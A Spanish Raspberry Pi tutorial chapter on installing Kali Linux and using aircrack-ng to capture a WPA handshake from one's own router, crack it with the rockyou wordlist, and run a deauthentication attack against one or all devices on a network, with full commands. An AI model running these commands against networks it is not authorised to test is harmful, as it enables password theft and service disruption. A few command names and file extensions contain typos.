|     Inicio    |   |         |  |   FOROS      |  |      |      
   Elastix - VoIP B4A (Basic4Android) App inventor 2 PHP - MySQL
  Estación meteorológica B4J (Basic4Java) ADB Shell - Android Arduino
  Raspberry Pi Visual Basic Script (VBS) FireBase (BD autoactualizable) NodeMCU como Arduino
  AutoIt (Programación) Visual Basic Cosas de Windows Webs interesantes
Translate:
Búsqueda en este sitio:


.

Raspberry Pi

Tutorial de Rapberry Pi en español.
- Juan Antonio Villalpando -

Volver al índice del tutorial

____________________________

45.- Kali. Linux en Raspberry. Hack red. Desautentificación.

.- Kali linux en RPi para hack
http://stuffjasondoes.com/2018/07/18/capturing-wpa2-psk-handshake-with-kali-linux-and-aircrack/

 

- Kali es una instalación de Linux, en nuestro caso en el Raspberry Pi. Se utiliza mucho para hackear contraseña de red, desautentificar usuarios en la red,...

- ¿Qué es Kali? en inglés: https://docs.kali.org/introduction/what-is-kali-linux

- Kali es más lento que Raspbian.

______________
1.- Instalación.

- Vamos a instalar Kali para nuestro Raspberry Pi, lo instalaremos en una SdCard, si anteriormente tuviéramos algo instalado en esa SdCard, se borrará.

- https://docs.kali.org/kali-on-arm/install-kali-linux-arm-raspberry-pi

- Vamos a: https://www.offensive-security.com/kali-linux-arm-images/

- Bajamos a nuestro ordenador: kali-linux-2019.2a-rpi3-nexmon.img.xz (914 MB)

- https://docs.kali.org/kali-on-arm/kali-linux-raspberry-pi2

____________________________________________________________
2.- Carga la imagen del archivo anterior en la SdCard mediante Etcher.

- Etcher es una pequeña aplicación para cargar un archivo imagen a la SdCard.

- Bajamos Etcher de: https://www.balena.io/etcher/ (142 MB)

- Insertamos nuestra SdCard en el ordenador y cargamos la imagen kali-linux-2019.2a-rpi3-nexmon.img.xz desde nuestro ordenador a la SdCard.

- Una vez cargada la imagen en la SdCard, la insertamos en nuestro Raspberry.

____________________________________________________________
3.- Entrada y teclado.

- Debe salir una ventana de autentificación:


Usuario: root
Password: toor

- Podemos desplazarnos por los casilleros mediante la tecla del Tabulador.

- Lo primero que debemos hacer es poner el teclado en español, para ello entramos en un Terminal y escribimos:

  setxkbmap es sundeadkeys

- La red WiFi o cable.

- En el vértice superior derecho de la pantalla está el icono de configuración de red.

- Se suele ejecutar estas dos órdenes.

apt-get update

apt-get upgrade

apt-get update: actualiza la lista de paquetes disponibles y sus versiones, pero no instala o actualiza ningún paquete. Esta lista la coge de los servidores con repositorios que tenemos definidos en el sources.list. Tarda unos segundos.
apt-get upgrade: una vez el comando anterior ha descargado la lista de software disponible y la versión en la que se encuentra, podemos actualizar dichos paquetes usando este comando. Instalará las nuevas versiones. Puede tardar más de media hora.

- Podemos instalar un Editor de texto:

apt-get install gedit

- Otra cosa que podemos hacer es instalar un capturador de pantalla, utilizaremos el scrot

- apt-get install scrot

- Cuando esté instalado escribimos en un Terminal:

scrot -d 5

- A los 5 segundos capturará toda la pantalla y guardará la imagen en nuestra carpeta personal.

____________________________________________________________
4.- Ejercicio de aprendizaje: Obtener la contraseña de nuestro Router.

- Seguiremos este tutorial:

https://irvinlim.com/blog/hacking-my-mobile-hotspot-with-aircrack-ng/

- En ese tutorial el usuario crea un Punto de Acceso hotspot en su móvil con cierta contraseña y luego trata de obtenerla con aircrack. Para que funcione algunos usuarios deben entrar en esa red creada en el móvil, si no entra nadie no podrá obtener la clave.

- También lo podemos hacer esta prueba de aprendizaje en nuestro Router, entramos en la configuración de nuestro Router y cambiamos el password de la red WiFi a una medianamente sencilla, por ejemplo: holaamigo y observaremos si este proceso puede captar esa contraseña. Durante el tiempo de captación de información deben entrar varios usuarios en la red de nuestro Router para que exista tráfico de red.

- Vamos al kali.

- Primero trataremos de obtener la contraseña encriptada y luego desencriptarla.

A.- Obtener el archivo .cab con la contraseña encriptada:

Seguimos estos pasos indicado en este tutorial: https://irvinlim.com/blog/hacking-my-mobile-hotspot-with-aircrack-ng/

1.- Arrancar la red y obtener el nombre de nuestra Interface de red.

airmon-ng start wlan0

PHY Interface Driver Chipset
phy0 wlan0 ath10k_pci Qualcomm A

Otra forma de obtenerlo es mediante el comando: iwconfig

- Normalmente será wlan0 o wlan0mon

2.- Obtener el nombre de las redes WiFi que hay en nuestro entorno, ponemos el nombre de nuestra Interface, en mi caso wlan0

airodump-ng wlan0

- Entre las redes que hemos obtenido debe estar la de nuestro Router:

- Tomamos la BSSID y canal (CH) de nuestro Router.

3.- Obtener la clave encriptada de esa red, ponemos la BBSID y el CH de la red en esta orden, en este caso canal CH 5 y BSSID 2E:0E:3D:AA:BB:CC

airodump-ng -c 5 --bssid 2E:0E:3D:AA:BB:CC -w . wlan0

4.- La red deberá estar activa y entrar varios usuarios, cuando consiga 4 entradas se obtendrá en la parte de arriba algo así:

CH 5 ][ Elapsed: 120 s ][ 2019-07-16 12:46 ][ WPA handshake: 2E:0E:3D:AA:BB:CC ]

- Eso indica que ha obtenido el archivo en donde se encuentra la contraseña codificada. Para verlo ponemos:

ls -al

- Saldrán varios archivos con la extensión .cab, tomamos el último, por ejemplo .-04.cab

B.- Desencriptar la contraseña obtenida en .-04.cab

- Podríamos tomar ese archivo y llevarlo a un ordenador más rápido para desencriptar la contraseña, pero para hacer nuestra prueba vamos a desencriptarla también desde el Rasbperry con Kali.

- Para desencriptarla vamos a utilizar un diccionario de claves típicas que contiene un millón y medio de claves utilizadas con frecuencia, este archivo se llama rockyou.txt y lo puedes bajar de aquí:

https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt (180 MB)

- Vamos a suponer que lo has guardado en /root/rockyou.txt

- Ejecutamos esta orden:

aircrack-ng -a2 -b 2E:0E:3D:AA:BB:CC -w /root/rockyou.txt .-04.cab

- Si la clave se encuentra en ese gran diccionario, al cabo del tiempo saldrá KEY FOUND! [ holaamigo ]

________________________________
- Desautentificar usuarios de la red.

Otra cosa que puedes hacer con kali es desauntificar a usuarios de la red, a un usuario en particular o a todos los usuarios de una red, pare eso busca en internet:

kali deauth attack

https://www.aircrack-ng.org/doku.php?id=deauthentication

iwconfig

airmon-ng start wlan0

- Esto obtiene el BSSID del router:

airdump-ng wlan0mon

- Esto obtiene el BSSID de los dispositivos conectados al router:

airodump-ng wlan0mon --bssid [BSSID del router]--channel [número de canal]

- Desautentifica a un dispositivo:

aireplay-ng --deauth 0 -c [BSSID del dispositivo que quieres desautentificar] -a [BSSID del router] wlan0mon

___________________________________________________

 

- Mi correo:
juana1991@yahoo.com
- KIO4.COM - Política de cookies. Textos e imágenes propiedad del autor:
© Juan A. Villalpando
No se permite la copia de información ni imágenes.
Usamos cookies propias y de terceros que entre otras cosas recogen datos sobre sus hábitos de navegación y realizan análisis de uso de nuestro sitio.
Si continúa navegando consideramos que acepta su uso. Acepto    Más información